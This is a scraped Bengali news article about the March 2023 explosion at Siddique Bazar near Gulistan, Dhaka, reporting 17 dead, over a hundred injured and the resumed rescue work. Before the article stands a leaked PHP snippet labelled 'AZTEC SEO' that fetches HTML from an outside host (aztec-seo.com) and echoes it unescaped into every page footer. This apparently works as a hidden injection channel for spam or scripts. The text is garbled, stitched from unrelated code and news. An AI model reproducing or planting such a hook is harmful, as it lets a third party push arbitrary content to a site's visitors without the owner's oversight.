/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); গুলিস্তানে বিস্ফোরণ : নিহত ১৭ আহত শতাধিক | Dhaka Sky News

পবিত্র শবে বরাত পালিত

আগের সংবাদ

বাংলাদেশ ইতিহাস গড়ল বিশ্বচ্যাম্পিয়নদের হারিয়ে

পরের সংবাদ

দ্বিতীয় দিনের উদ্ধার অভিযান শুরু

গুলিস্তানে বিস্ফোরণ : নিহত ১৭ আহত শতাধিক

নিজস্ব প্রতিবেদক

প্রকাশিত: March 8, 2023 , 11:40 am

রাজধানীর গুলিস্তানে বিআরটিসি কাউন্টারের পাশে বিস্ফোরণের ঘটনায় ক্ষতিগ্রস্ত ভবনে উদ্ধার অভিযান আজ বুধবার সকালে ফের শুরু হয়েছে। মঙ্গলবার রাত পৌনে ১১টার দিকে উদ্ধারকাজ স্থগিত হয়। বুধবার সকাল ৯টার পর ফায়ার সার্ভিস উদ্ধারকাজ শুরু করে। ঘটনাস্থলে রয়েছেন ঢাকা মহানগর পুলিশের (ডিএমপি) লালবাগ বিভাগে উপ-পুলিশ কমিশনার (ডিসি)।
এর আগে ফায়ার সার্ভিসের উপপরিচালক দীনমনি শর্মা জানিয়েছিলেন ‘আজকের (মঙ্গলবার) মতো উদ্ধার অভিযান স্থগিত করতে হয়েছে। ভবনটি ঝুঁকিপূর্ণ হওয়ায় ভবনের বেসমেন্টে যাওয়া সম্ভব হচ্ছে না। সকালে সেনাবাহিনী এলে আবার উদ্ধারকাজ শুরু হবে।’
বিস্ফোরণের ঘটনায় এখন পর্যন্ত ১৭ জন নিহত হওয়ার তথ্য পাওয়া গেছে। মঙ্গলবার দিবাগত রাত ২টা পর্যন্ত ১৬টি মরদেহ হস্তান্তর করা হয়। এ ঘটনায় আহত হয়েছেন শতাধিক মানুষ।
মঙ্গলবার বিকেল পৌনে পাঁচটার দিকে গুলিস্তানে বিআরটিসির বাস কাউন্টারের কাছে সিদ্দিকবাজারে ভয়াবহ বিস্ফোরণ ঘটে। এতে পাশাপাশি দুটি বহুতল ভবন ক্ষতিগ্রস্ত হয়। একটি ভবন সাততলা, আরেকটি পাঁচতলা। এর মধ্যে সাততলা ভবনের বেজমেন্ট, প্রথম ও দ্বিতীয় তলা বিধ্বস্ত হয়েছে। আর পাঁচতলা ভবনের নিচতলা বিধ্বস্ত হয়েছে।